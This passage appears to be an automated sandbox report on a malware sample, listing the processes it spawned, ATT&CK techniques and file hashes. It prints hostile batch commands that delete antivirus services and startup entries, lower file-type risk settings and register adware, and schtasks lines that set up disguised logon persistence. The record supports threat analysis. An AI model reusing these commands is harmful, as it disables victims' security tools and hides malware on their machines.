"HKLM\SYSTEM\CurrentControlSet\services\mcpltsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McProxy" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McODS" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfemms" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAfee SiteAdvisor Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfevtp" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McNaiAnn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\nanosvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\NortonSecurity" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\!SASCORE" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\SBAMSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVAuxSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVCoreSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\QHActiveDefense" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Firewall" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVG Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirMailService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\Avira.ServiceHost" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirWebService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirSchedulerService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsservppl" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ProductAgentService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsserv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\updatesrv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdAgent" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdvirth" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\DragonUpdater" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ekrn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\0247141531883172mcinstcleanup" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\PEFService" /f set "osX=%PROCESSOR_ARCHITECTURE%" if defined PROCESSOR_ARCHITEW6432 set "osX=AMD64" if "%osX%"=="x86" ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg64.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlservice.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -boot" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f ) else ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg64.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlservice.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -boot" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 )
4⤵
PID:2224

C:\Users\Admin\AppData\Local\Temp\2FFE.exe
C:\Users\Admin\AppData\Local\Temp\2FFE.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4040

C:\Users\Admin\AppData\Local\Temp\2FFE.exe
C:\Users\Admin\AppData\Local\Temp\2FFE.exe
2⤵
- Executes dropped EXE
PID:4184

C:\Users\Admin\AppData\Local\Temp\4675.exe
C:\Users\Admin\AppData\Local\Temp\4675.exe
1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2224

C:\Users\Admin\AppData\Local\Temp\cheat.exe
"C:\Users\Admin\AppData\Local\Temp\cheat.exe"
2⤵
- Executes dropped EXE
PID:4636

C:\Users\Admin\AppData\Local\Temp\4ADB.exe
C:\Users\Admin\AppData\Local\Temp\4ADB.exe
1⤵
- Executes dropped EXE
PID:1344

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1344 -s 732
2⤵
- Program crash
PID:3008

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1344 -s 776
2⤵
- Program crash
PID:980

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1344 -s 780
2⤵
- Program crash
PID:1532

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1344 -s 892
2⤵
- Program crash
PID:784

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1344 -s 888
2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:2732

C:\Users\Admin\AppData\Local\Temp\4FCE.exe
C:\Users\Admin\AppData\Local\Temp\4FCE.exe
1⤵
- Executes dropped EXE
PID:2728

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2728 -s 732
2⤵
- Program crash
PID:876

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2728 -s 736
2⤵
- Program crash
PID:3920

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2728 -s 720
2⤵
- Program crash
- Suspicious use of WriteProcessMemory
PID:2064

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2728 -s 736
2⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:3916

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2728 -s 880
2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:3836

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:2840

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:860

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:3008

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:3992

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:2860

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:1144

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:1496

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:892

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:1540

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Windows\System32\catsrvps\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4952

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fsucenter" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\log20210811_215406\fsucenter.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4976

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "ShellExperienceHost" /sc ONLOGON /tr "'C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\resources\ShellExperienceHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2688

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\regedit\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5028

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WerFault" /sc ONLOGON /tr "'C:\Windows\SysWOW64\wcnwiz\WerFault.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:716

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Virtualization/Sandbox Evasion

T1497

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Data\Database.exe
MD5
30f0a5fe731fd2735b8c196fd0fe91cf

SHA1
2eb63724fd11bf8e082bcd99301654111ad0d831

SHA256
13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

SHA512
acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

Download Submit
C:\ProgramData\Data\Database.exe
MD5
30f0a5fe731fd2735b8c196fd0fe91cf

SHA1
2eb63724fd11bf8e082bcd99301654111ad0d831

SHA256
13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

SHA512
acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

Download Submit
C:\ProgramData\Data\Database.exe
MD5
30f0a5fe731fd2735b8c196fd0fe91cf

SHA1
2eb63724fd11bf8e082bcd99301654111ad0d831

SHA256
13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

SHA512
acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

Download Submit
C:\ProgramData\Data\Database.exe
MD5
30f0a5fe731fd2735b8c196fd0fe91cf

SHA1
2eb63724fd11bf8e082bcd99301654111ad0d831

SHA256
13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

SHA512
acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

Download Submit
C:\ProgramData\Data\Database.exe
MD5
30f0a5fe731fd2735b8c196fd0fe91cf

SHA1
2eb63724fd11bf8e082bcd99301654111ad0d831

SHA256
13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

SHA512
acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

Download Submit
C:\ProgramData\Data\Database.exe
MD5
30f0a5fe731fd2735b8c196fd0fe91cf

SHA1
2eb63724fd11bf8e082bcd99301654111ad0d831

SHA256
13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

SHA512
acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

Download Submit
C:\ProgramData\Data\Database.exe
MD5
30f0a5fe731fd2735b8c196fd0fe91cf

SHA1
2eb63724fd11bf8e082bcd99301654111ad0d831

SHA256
13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

SHA512
acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

Download Submit
C:\ProgramData\Data\Database.exe
MD5
30f0a5fe731fd2735b8c196fd0fe91cf

SHA1
2eb63724fd11bf8e082bcd99301654111ad0d831

SHA256
13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

SHA512
acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

Download Submit
C:\ProgramData\Data\Database.exe
MD5
30f0a5fe731fd2735b8c196fd0fe91cf

SHA1
2eb63724fd11bf8e082bcd99301654111ad0d831

SHA256
13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

SHA512
acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

Download Submit
C:\ProgramData\Data\Database.exe
MD5
30f0a5fe731fd2735b8c196fd0fe91cf

SHA1
2eb63724fd11bf8e082bcd99301654111ad0d831

SHA256
13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

SHA512
acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

Download Submit
C:\ProgramData\Data\Database.exe
MD5
30f0a5fe731fd2735b8c196fd0fe91cf

SHA1
2eb63724fd11bf8e082bcd99301654111ad0d831

SHA256
13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

SHA512
acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

Download Submit
C:\ProgramData\Data\Database.exe
MD5
30f0a5fe731fd2735b8c196fd0fe91cf

SHA1
2eb63724fd11bf8e082bcd99301654111ad0d831

SHA256
13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

SHA512
acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

Download Submit
C:\ProgramData\Data\Database.exe
MD5
30f0a5fe731fd2735b8c196fd0fe91cf

SHA1
2eb63724fd11bf8e082bcd99301654111ad0d831

SHA256
13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

SHA512
acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

Download Submit
C:\ProgramData\Data\Database.exe
MD5
30f0a5fe731fd2735b8c196fd0fe91cf

SHA1
2eb63724fd11bf8e082bcd99301654111ad0d831

SHA256
13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

SHA512
acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

Download Submit
C:\ProgramData\Data\install.exe
MD5
3319cb474eaa2f3812956b271ff29635

SHA1
74fbed926e8de14fa5eb6a5a47fb873def72fb81

SHA256
79d27a1a2980812c98a473a189158fcc2f77ca82e5720f9e060ff81e5842f27a

SHA512
c7139cc744cbafd9618638e7d68e4464da7a6052c10a1906bf7f5ede49128c4f3a05bc49daefbd8a19393887a78a5ca0f7efb3eb06889af9dae0d104870b7347

Download Submit
C:\ProgramData\Data\install.exe
MD5
3319cb474eaa2f3812956b271ff29635

SHA1
74fbed926e8de14fa5eb6a5a47fb873def72fb81

SHA256
79d27a1a2980812c98a473a189158fcc2f77ca82e5720f9e060ff81e5842f27a

SHA512
c7139cc744cbafd9618638e7d68e4464da7a6052c10a1906bf7f5ede49128c4f3a05bc49daefbd8a19393887a78a5ca0f7efb3eb06889af9dae0d104870b7347

Download Submit
C:\ProgramData\Runtimebroker.exe
MD5
8fdc2723951d30a7e286376dc51d7cfb

SHA1
ce0166b27145cd60f8c6b6c681a6c15c14a8728a

SHA256
3fd0bc35561d9572ae825042276b8b809371ac9ebdd6bde71e67f9f86117e560

SHA512
ab4afdb4555a56be5079630d0e8cf5b7648c110dcf365caabfb61cef692038ed30f04976219a127d81dd3d1ec474494eeb360b9a487a6f307f866e07eab39b67

Download Submit
C:\ProgramData\Runtimebroker.exe
MD5
8fdc2723951d30a7e286376dc51d7cfb

SHA1
ce0166b27145cd60f8c6b6c681a6c15c14a8728a

SHA256
3fd0bc35561d9572ae825042276b8b809371ac9ebdd6bde71e67f9f86117e560

SHA512
ab4afdb4555a56be5079630d0e8cf5b7648c110dcf365caabfb61cef692038ed30f04976219a127d81dd3d1ec474494eeb360b9a487a6f307f866e07eab39b67

Download Submit
C:\ProgramData\Systemd\HostData.exe
MD5
cbf26c74a0a12b5f17ba7596ff6ad19f

SHA1
6dc733432c290f1fbf5ddda2571b7f538445202b

SHA256
095094f579ee811aa3da840541b94bca89a4c899e2236a0995ee655261a68983

SHA512
8a562fc0920cb02fe161c359b8fe73ff02e26c9605f970c6f511ad933fe164eceaec8279fdfe3d198837f2f9980a986f82508ee758a1632bcd7ab041152db11b

Download Submit
C:\ProgramData\Systemd\HostData.exe
MD5
cbf26c74a0a12b5f17ba7596ff6ad19f

SHA1
6dc733432c290f1fbf5ddda2571b7f538445202b

SHA256
095094f579ee811aa3da840541b94bca89a4c899e2236a0995ee655261a68983

SHA512
8a562fc0920cb02fe161c359b8fe73ff02e26c9605f970c6f511ad933fe164eceaec8279fdfe3d198837f2f9980a986f82508ee758a1632bcd7ab041152db11b

Download Submit
C:\ProgramData\Systemd\config.json
MD5
a285ac140c8c6806223bfdc02302173e

SHA1
06ca61cae058c568860858e49615d04dc4a8820d

SHA256
36d5713cc13ea15449ab8defc943e42cc657b503a79f0859600ea275598441eb

SHA512
f82eae8304aa9ba504eba0e96468fdac08420b0e158c3263a4f47474b02fb5f751b1bd2335e71a33341d81a495083c7dd8e0479e2c48dbaf6a3f7fefb9f4054b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
MD5
6bf0e5945fb9da68e1b03bdaed5f6f8d

SHA1
eed3802c8e4abe3b327c100c99c53d3bbcf8a33d

SHA256
dda58fd16fee83a65c05936b1a070187f2c360024650ecaf857c5e060a6a55f1

SHA512
